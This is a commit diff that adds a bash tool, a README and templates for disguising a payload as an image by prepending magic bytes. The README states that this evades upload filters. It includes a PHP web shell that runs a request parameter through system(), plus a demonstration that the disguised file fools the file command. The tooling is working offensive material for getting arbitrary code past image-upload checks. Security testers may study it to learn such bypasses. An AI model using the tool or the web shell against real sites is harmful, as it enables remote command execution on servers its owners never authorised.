parent
aaaca6ea82
commit
4e40323a73
6 changed files with 106 additions and 0 deletions
@ -0,0 +1,36 @@ |
|||||||
|
# Scripts for payload generation |
||||||
|
|
||||||
|
## generateImageFromPayload |
||||||
|
|
||||||
|
This script is designed to disguise a payload as an image. It does this by adding the first 20 bytes of a real image to the beginning of the file and adding a file extension. This will fool most filters that, for example, might only allow images to be uploaded. |
||||||
|
|
||||||
|
To use it, you will need to have a payload ready to use. It could be anything, here is a simple php script named payload.php |
||||||
|
|
||||||
|
```php |
||||||
|
<?php |
||||||
|
if( isset( $_REQUEST['jh'] ) ): |
||||||
|
system( $_REQUEST['jh'] ); |
||||||
|
endif; |
||||||
|
``` |
||||||
|
|
||||||
|
If I run `generateImageFromPayload payload.php`, the script will create a file called `payload.php.jpg`. |
||||||
|
|
||||||
|
``` |
||||||
|
. |
||||||
|
├── payload.php |
||||||
|
└── payload.php.jpg |
||||||
|
``` |
||||||
|
|
||||||
|
After running `file` on both, you will see that it incorrectly identifies the second as an image. |
||||||
|
|
||||||
|
```sh |
||||||
|
file payload.php* |
||||||
|
payload.php: PHP script, ASCII text |
||||||
|
payload.php.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16 |
||||||
|
``` |
||||||
|
|
||||||
|
The script will, by default, generate a jpg although you can specify png or gif by adding a second argument, e.g. |
||||||
|
|
||||||
|
``` |
||||||
|
generateImageFromPayload payload.php png |
||||||
|
``` |
@ -0,0 +1,65 @@ |
|||||||
|
#!/usr/bin/env bash |
||||||
|
|
||||||
|
# This script takes a payload and disguises it as an image. |
||||||
|
|
||||||
|
SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" |
||||||
|
CURRENT=$(pwd) |
||||||
|
|
||||||
|
PAYLOAD="$1" |
||||||
|
IMAGETYPE="${2:-jpg}" |
||||||
|
# Make sure the image type is lower case |
||||||
|
IMAGETYPE=$(echo "$IMAGETYPE" | tr '[:upper:]' '[:lower:]') |
||||||
|
|
||||||
|
# This function prints the usage |
||||||
|
function printUsage(){ |
||||||
|
echo "Usage: $(basename "$0") PAYLOAD TYPE" |
||||||
|
echo "" |
||||||
|
echo "Disguises a payload as an image" |
||||||
|
echo "" |
||||||
|
echo -e "PAYLOAD\t\tThe payload to use, currently only supports a file in CWD (Required)" |
||||||
|
echo -e "TYPE\t\tThe type of image (jpg, png, gif) (default: jpg)" |
||||||
|
} |
||||||
|
|
||||||
|
function getPayload(){ |
||||||
|
local payload="$CURRENT/$PAYLOAD" |
||||||
|
echo "$payload" |
||||||
|
if [ -f "$payload" ]; then |
||||||
|
exit 0 |
||||||
|
else |
||||||
|
# Add stuff here if we want to look in another folder for payloads at some point |
||||||
|
exit 1 |
||||||
|
fi |
||||||
|
} |
||||||
|
|
||||||
|
function getTemplate(){ |
||||||
|
local template="$SCRIPTPATH/templates/payload.$IMAGETYPE" |
||||||
|
echo "$template" |
||||||
|
if [ -f "$template" ]; then |
||||||
|
exit 0 |
||||||
|
else |
||||||
|
exit 1 |
||||||
|
fi |
||||||
|
} |
||||||
|
|
||||||
|
function getDestination(){ |
||||||
|
echo "$CURRENT/$PAYLOAD.$IMAGETYPE" |
||||||
|
exit 0 |
||||||
|
} |
||||||
|
|
||||||
|
if template=$(getTemplate); then |
||||||
|
if payload=$(getPayload); then |
||||||
|
# Do copy stuff |
||||||
|
destination=$(getDestination) |
||||||
|
cp "$template" "$destination" |
||||||
|
cat "$payload" >> $destination |
||||||
|
else |
||||||
|
"No such payload $payload" |
||||||
|
echo "" |
||||||
|
printUsage |
||||||
|
fi |
||||||
|
else |
||||||
|
echo "No such template $template" |
||||||
|
echo "" |
||||||
|
printUsage |
||||||
|
exit 1 |
||||||
|
fi |
@ -0,0 +1,5 @@ |
|||||||
|
# Image templates |
||||||
|
|
||||||
|
These images are not real images. They take the first 20 bites of an example image of each type. |
||||||
|
|
||||||
|
By adding code to these, you will be able to evade many upload filters that only allow images |
After Width: | Height: | Size: 20 B |
After Width: | Height: | Size: 20 B |
After Width: | Height: | Size: 21 B |
Loading…
Reference in new issue